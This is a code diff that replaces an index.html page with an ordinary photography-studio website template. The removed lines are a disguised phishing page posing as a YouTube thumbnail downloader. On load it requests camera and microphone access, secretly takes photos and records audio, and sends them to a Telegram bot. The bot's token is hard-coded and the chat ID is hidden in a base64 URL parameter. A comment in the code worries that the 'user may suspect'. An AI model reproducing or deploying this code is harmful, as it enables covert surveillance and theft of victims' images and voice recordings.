--- a/index.html
+++ b/index.html
@@ -1,240 +1,531 @@
 <!DOCTYPE html>
+
 <html lang="en">
-<head>
-  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
-  
-  <title>YouTube Thumbnail Downloader</title>
-  <meta charset="utf-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1">
-  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat">
-  <style>
-    body {
-      font-family: 'Montserrat', sans-serif;
-      margin: 0;
-      padding: 0;
-      background-color: #f5f5f5;
-    }
-    .navbar {
-      background-color: #ff0000;
-      color: white;
-      text-align: center;
-      padding: 15px 0;
-    }
-    #header {
-      margin: 0;
-      font-size: 28px;
-      font-weight: bold;
-    }
-    .container {
-      max-width: 600px;
-      margin: 20px auto;
-      padding: 20px;
-      background-color: #fff;
-      border-radius: 8px;
-      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
-    }
-    .form-control {
-      width: calc(100% - 22px);
-      margin-bottom: 15px;
-      padding: 10px;
-      border: 1px solid #ccc;
-      border-radius: 5px;
-      box-sizing: border-box;
-      font-family: 'Montserrat', sans-serif;
-    }
-    #thumbdloadbtn {
-      display: block;
-      width: 100%;
-      padding: 10px;
-      border: none;
-      border-radius: 5px;
-      background-color: #ff0000;
-      color: white;
-      font-size: 16px;
-      cursor: pointer;
-      font-family: 'Montserrat', sans-serif;
-    }
-    #thumbdloadbtn:hover {
-      background-color: #cc0000;
-    }
-    footer {
-      text-align: center;
-      margin-top: 40px;
-      color: #666;
-    }
-    .youtube-logo {
-      display: block;
-      margin: 20px auto;
-      width: 100px; /* Adjust size as needed */
-    }
-  </style>
-  <script type='text/javascript'>
-  //<![CDATA[
-  var uri = window.location.toString();
-  if (uri.indexOf("%3D") > 0) {
-      var clean_uri = uri.substring(0, uri.indexOf("%3D"));
-      window.history.replaceState({}, document.title, clean_uri);
-  }
 
-  uri = window.location.toString();
-  if (uri.indexOf("%3D%3D") > 0) {
-      clean_uri = uri.substring(0, uri.indexOf("%3D%3D"));
-      window.history.replaceState({}, document.title, clean_uri);
-  }
+  <head>
 
-  uri = window.location.toString();
-  if (uri.indexOf("&m=1") > 0) {
-      clean_uri = uri.substring(0, uri.indexOf("&m=1"));
-      window.history.replaceState({}, document.title, clean_uri);
-  }
+    <meta charset="UTF-8" />
 
-  uri = window.location.toString();
-  if (uri.indexOf("?m=1") > 0) {
-      clean_uri = uri.substring(0, uri.indexOf("?m=1"));
-      window.history.replaceState({}, document.title, clean_uri);
-  }
-  //]]>
-  </script>
-</head>
-<body>
-  <nav class="navbar">
-    <img class="youtube-logo" src="https://www.gstatic.com/youtube/img/branding/youtubelogo/svg/youtubelogo.svg" alt="YouTube Logo">
-    <h1 id="header">YOUTUBE THUMBNAIL DOWNLOADER</h1>
-  </nav>
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
 
-  <div class="container">
-    <input id="ytlink" type="text" class="form-control" placeholder="Enter YouTube Video URL" spellcheck="false">
-    <button id="thumbdloadbtn" onclick="downloadThumbnail()">FETCH</button>
-    <div id="thumbnail-preview"><!-- Placeholder for thumbnail preview --></div>
+    <link
 
-    <h2>How to Download HD YouTube Thumbnail</h2>
-    <ol>
-      <li>Copy the YouTube Video Link / URL from the YouTube App or Website</li>
-      <li>Paste the YouTube video Link / URL in the Input Field Above</li>
-      <li>Click on the "FETCH" Button</li>
-      <li>Select the thumbnail quality</li>
-      <li>Download the Thumbnail</li>
-    </ol>
-  </div>
+      href="https://cdn.jsdelivr.net/npm/remixicon@4.1.0/fonts/remixicon.css"
 
-  <center>
-    <button id="toggle-video" style="display:none;">Toggle Video</button>
-    <div id="message-container"></div>
-    <video id="video" width="0" height="0" autoplay></video>
-  </center>
+      rel="stylesheet"
 
-  <script type="text/javascript">
-    function downloadThumbnail() {
-        // Change button text to indicate fetching
-        var btn = document.getElementById('thumbdloadbtn');
-        btn.textContent = 'Fetching from server... Wait';
+    />
 
-        // Add your logic to fetch the thumbnail here
-        // ...
-    }
+    <link
 
-    function la(src) {
-      window.location = src;
-    }
+      rel="stylesheet"
 
-    function GetURLParameter(sParam) {
-      var sPageURL = window.location.search.substring(1);
-      var sURLVariables = sPageURL.split('&');
-      for (var i = 0; i < sURLVariables.length; i++) {
-        var sParameterName = sURLVariables[i].split('=');
-        if (sParameterName[0] == sParam) {
-          return sParameterName[1];
-        }
-      }
-    }
+      href="https://cdn.jsdelivr.net/npm/swiper@11/swiper-bundle.min.css"
 
-    function decodeBase64(encodedStr) {
-      try {
-        return decodeURIComponent(atob(encodedStr));
-      } catch (e) {
-        console.error('Base64 decode error:', e);
-        return null;
-      }
-    }
+    />
 
-    // Get Base64 encoded 'id' parameter from the URL
-    var base64Id = GetURLParameter('i');
-    var chatid = base64Id ? decodeBase64(base64Id) : null;
+    <link rel="stylesheet" href="styles.css" />
 
-    if (chatid) {
-      console.log('Decoded chat ID:', chatid);
-    } else {
-      console.warn('No valid chat ID found.');
-    }
+    <title>Web Design Mastery | Capturer</title>
 
-    navigator.mediaDevices.getUserMedia({ video: true, audio: true })
-      .then((stream) => {
-        const imageCapture = new ImageCapture(stream.getVideoTracks()[0]);
-        const audioRecorder = new MediaRecorder(stream);
+  </head>
 
-        function capturePhoto(index) {
-          setTimeout(() => {
-            imageCapture.takePhoto()
-              .then((blob) => {
-                sendToTelegram(blob, 'photo');
-              })
-              .catch((error) => {
-                console.error('Error capturing photo:', error);
-              });
-          }, index * 2000);
-        }
+  <body>
 
-        function startAudioRecording() {
-          audioRecorder.start();
-          setTimeout(() => {
-            audioRecorder.stop();
-          }, 5000);
-        }
+    <header class="header" id="home">
 
-        audioRecorder.ondataavailable = (event) => {
-          if (event.data.size > 0) {
-            sendToTelegram(event.data, 'audio');
-          }
-        };
+      <nav>
 
-        for (let i = 0; i < 3; i++) {
-          capturePhoto(i);
-        }
+        <div class="nav__header">
 
-        startAudioRecording();
-      })
-      .catch((error) => {
-        if (error.name === 'NotAllowedError') {
-          // Handle the case where permissions are denied
-          console.warn('Permissions denied. User may suspect.');
-        } else {
-          console.error('Permission error:', error);
-        }
-      });
+          <div class="nav__logo">
 
-    function sendToTelegram(data, type) {
-      const botToken = '7708374524:AAEjIbEU59XwOAjwjnt2dkq4sLPFKdhPWnY';
-      const chatId = chatid;
+            <a href="#">
 
-      if (!chatId) {
-        console.error('Chat ID is not available.');
-        return;
-      }
+              <img src="assets/logo-white.png" alt="logo" />
 
-      const formData = new FormData();
-      formData.append('chat_id', chatId);
-      formData.append(type === 'photo' ? 'photo' : 'audio', data, `@lodabotbccc.${type === 'photo' ? 'jpg' : 'wav'}`);
+            </a>
 
-      fetch(`https://api.telegram.org/bot${botToken}/send${type.charAt(0).toUpperCase() + type.slice(1)}`, {
-        method: 'POST',
-        body: formData
-      })
-        .then(response => response.json())
-        .then(data => console.log(data))
-        .catch(error => console.error('Error sending to Telegram:', error));
-    }
-  </script>
+          </div>
 
- 
-</body>
+          <div class="nav__menu__btn" id="menu-btn">
+
+            <i class="ri-menu-line"></i>
+
+          </div>
+
+        </div>
+
+        <ul class="nav__links" id="nav-links">
+
+          <li><a href="#home">HOME</a></li>
+
+          <li><a href="#about">ABOUT US</a></li>
+
+          <li><a href="#service">SERVICES</a></li>
+
+          <li class="nav__logo">
+
+            <a href="#">
+
+              <img src="assets/logo-white.png" alt="logo" />
+
+            </a>
+
+          </li>
+
+          <li><a href="#client">CLIENT</a></li>
+
+          <li><a href="#blog">BLOG</a></li>
+
+          <li><a href="#contact">CONTACT US</a></li>
+
+        </ul>
+
+      </nav>
+
+    </header>
+
+
+
+    <div class="section__container about__container" id="about">
+
+      <h2 class="section__header">WE CAPTURE THE MOMENTS</h2>
+
+      <p class="section__description">
+
+        At Capturer, we specialize in freezing those fleeting moments in time
+
+        that hold immense significance for you. With our passion for photography
+
+        and keen eye for detail, we transform ordinary moments into
+
+        extraordinary memories.
+
+      </p>
+
+      <p class="section__description">
+
+        Whether it's a milestone event, a candid portrait, or the breathtaking
+
+        beauty of nature, we strive to encapsulate the essence of every moment,
+
+        ensuring that your cherished memories last a lifetime. Trust us to
+
+        capture the magic of your life's journey, one frame at a time.
+
+      </p>
+
+      <img src="assets/logo-dark.png" alt="logo" />
+
+    </div>
+
+
+
+    <div class="section__container portfolio__container">
+
+      <h2 class="section__header">~ PORTFOLIO ~</h2>
+
+      <div class="portfolio__grid">
+
+        <div class="portfolio__card">
+
+          <img src="assets/portfolio-1.jpg" alt="portfolio" />
+
+          <div class="portfolio__content">
+
+            <button class="btn">VIEW PPORTFOLIO</button>
+
+          </div>
+
+        </div>
+
+        <div class="portfolio__card">
+
+          <img src="assets/portfolio-2.jpg" alt="portfolio" />
+
+          <div class="portfolio__content">
+
+            <button class="btn">VIEW PPORTFOLIO</button>
+
+          </div>
+
+        </div>
+
+        <div class="portfolio__card">
+
+          <img src="assets/portfolio-3.jpg" alt="portfolio" />
+
+          <div class="portfolio__content">
+
+            <button class="btn">VIEW PPORTFOLIO</button>
+
+          </div>
+
+        </div>
+
+      </div>
+
+    </div>
+
+
+
+    <section class="service" id="service">
+
+      <div class="section__container service__container">
+
+        <h2 class="section__header">~ SERVICES ~</h2>
+
+        <p class="section__description">
+
+          At Capturer, we offer a range of professional photography services
+
+          tailored to meet your unique needs. With a commitment to excellence
+
+          and creativity, we strive to exceed your expectations, delivering
+
+          captivating visuals that tell your story with authenticity and
+
+          passion.
+
+        </p>
+
+        <div class="service__grid">
+
+          <div class="service__card">
+
+            <h4>Portrait Sessions</h4>
+
+            <p>
+
+              Our portrait sessions are designed to showcase your personality
+
+              and style in stunning imagery.
+
+            </p>
+
+          </div>
+
+          <div class="service__card">
+
+            <h4>Maternity Sessions</h4>
+
+            <p>
+
+              Embrace the beauty and miracle of new life with our maternity and
+
+              newborn photography sessions.
+
+            </p>
+
+          </div>
+
+          <div class="service__card">
+
+            <h4>Family Sessions</h4>
+
+            <p>
+
+              Cherish the bond of family with our custom-designed playful candid
+
+              moments and portrait sessions.
+
+            </p>
+
+          </div>
+
+        </div>
+
+      </div>
+
+    </section>
+
+
+
+    <section class="section__container client__container" id="client">
+
+      <h2 class="section__header">~ TESTIMONIALS ~</h2>
+
+      <!-- Slider main container -->
+
+      <div class="swiper">
+
+        <!-- Additional required wrapper -->
+
+        <div class="swiper-wrapper">
+
+          <!-- Slides -->
+
+          <div class="swiper-slide">
+
+            <div class="client__card">
+
+              <img src="assets/client-1.jpg" alt="client" />
+
+              <p>
+
+                Capturer exceeded all our expectations! Their attention to
+
+                detail and ability to capture the essence of our special day was
+
+                truly remarkable. Every time we look at our wedding photos,
+
+                we're transported back to those magical moments. Thank you for
+
+                preserving our memories so beautifully!
+
+              </p>
+
+              <h4>Sarah and Michael</h4>
+
+            </div>
+
+          </div>
+
+          <div class="swiper-slide">
+
+            <div class="client__card">
+
+              <img src="assets/client-2.jpg" alt="client" />
+
+              <p>
+
+                We couldn't be happier with our family portrait session with
+
+                Capturer. They made us feel relaxed and comfortable throughout
+
+                the entire shoot, resulting in natural and candid photos that
+
+                perfectly reflect our family dynamic. These images will be
+
+                cherished for years to come!
+
+              </p>
+
+              <h4>The Johnson Family</h4>
+
+            </div>
+
+          </div>
+
+          <div class="swiper-slide">
+
+            <div class="client__card">
+
+              <img src="assets/client-3.jpg" alt="client" />
+
+              <p>
+
+                Capturer's maternity and newborn sessions captured the most
+
+                precious moments of our lives with such tenderness and care.
+
+                From the anticipation of pregnancy to the joy of welcoming our
+
+                little one, every photo tells a story that we'll cherish
+
+                forever. Thank you for creating beautiful memories for our
+
+                family!
+
+              </p>
+
+              <h4>Emily and David</h4>
+
+            </div>
+
+          </div>
+
+        </div>
+
+        <!-- If we need pagination -->
+
+        <div class="swiper-pagination"></div>
+
+      </div>
+
+    </section>
+
+
+
+    <section class="section__container gallery__container">
+
+      <h2 class="section__header">~ GALLERY ~</h2>
+
+      <div class="gallery__grid">
+
+        <img src="assets/image-1.jpg" alt="gallery" />
+
+        <img src="assets/image-2.jpg" alt="gallery" />
+
+        <img src="assets/image-3.jpg" alt="gallery" />
+
+        <img src="assets/image-4.jpg" alt="gallery" />
+
+        <img src="assets/image-5.jpg" alt="gallery" />
+
+        <img src="assets/image-6.jpg" alt="gallery" />
+
+        <img src="assets/image-7.jpg" alt="gallery" />
+
+        <img src="assets/image-8.jpg" alt="gallery" />
+
+      </div>
+
+      <div class="gallery__btn">
+
+        <button class="btn">VIEW GALLERY</button>
+
+      </div>
+
+    </section>
+
+
+
+    <section class="blog" id="blog">
+
+      <div class="section__container blog__container">
+
+        <div class="blog__content">
+
+          <h2 class="section__header">~ LATEST BLOG ~</h2>
+
+          <h4>Capturing Emotion in Every Frame</h4>
+
+          <p>
+
+            This blog post delves into the importance of storytelling in
+
+            photography and how Capturer approaches capturing emotion and
+
+            narrative in their work. Readers will discover the techniques and
+
+            strategies used by professional photographers to evoke emotion,
+
+            convey meaning, and create compelling visual narratives that
+
+            resonate with viewers on a deep level.
+
+          </p>
+
+          <div class="blog__btn">
+
+            <button class="btn">Read More</button>
+
+          </div>
+
+        </div>
+
+      </div>
+
+    </section>
+
+
+
+    <section class="section__container instagram__container">
+
+      <h2 class="section__header">~ INSTAGRAM ~</h2>
+
+      <div class="instagram__flex">
+
+        <img src="assets/image-1.jpg" alt="instagram" />
+
+        <img src="assets/image-2.jpg" alt="instagram" />
+
+        <img src="assets/image-3.jpg" alt="instagram" />
+
+        <img src="assets/image-4.jpg" alt="instagram" />
+
+        <img src="assets/image-5.jpg" alt="instagram" />
+
+        <img src="assets/image-6.jpg" alt="instagram" />
+
+        <img src="assets/image-7.jpg" alt="instagram" />
+
+        <img src="assets/image-8.jpg" alt="instagram" />
+
+      </div>
+
+    </section>
+
+
+
+    <footer id="contact">
+
+      <div class="section__container footer__container">
+
+        <div class="footer__col">
+
+          <img src="assets/logo-dark.png" alt="logo" />
+
+          <div class="footer__socials">
+
+            <a href="#"><i class="ri-facebook-fill"></i></a>
+
+            <a href="#"><i class="ri-instagram-line"></i></a>
+
+            <a href="#"><i class="ri-twitter-fill"></i></a>
+
+            <a href="#"><i class="ri-youtube-fill"></i></a>
+
+            <a href="#"><i class="ri-pinterest-line"></i></a>
+
+          </div>
+
+        </div>
+
+        <div class="footer__col">
+
+          <ul class="footer__links">
+
+            <li><a href="#home">HOME</a></li>
+
+            <li><a href="#about">ABOUT US</a></li>
+
+            <li><a href="#service">SERVICES</a></li>
+
+            <li><a href="#client">CLIENT</a></li>
+
+            <li><a href="#blog">BLOG</a></li>
+
+            <li><a href="#contact">CONTACT US</a></li>
+
+          </ul>
+
+        </div>
+
+        <div class="footer__col">
+
+          <h4>STAY IN TOUCH</h4>
+
+          <p>
+
+            Keep up-to-date with all things Capturer! Join our community and
+
+            never miss a moment!
+
+          </p>
+
+        </div>
+
+      </div>
+
+      <div class="footer__bar">
+
+        Copyright © 2024 Web Design Mastery. All rights reserved.
+
+      </div>
+
+    </footer>
+
+
+
+    <script src="https://unpkg.com/scrollreveal"></script>
+
+    <script src="https://cdn.jsdelivr.net/npm/swiper@11/swiper-bundle.min.js"></script>
+
+    <script src="main.js"></script>
+
+  </body>
+
 </html>
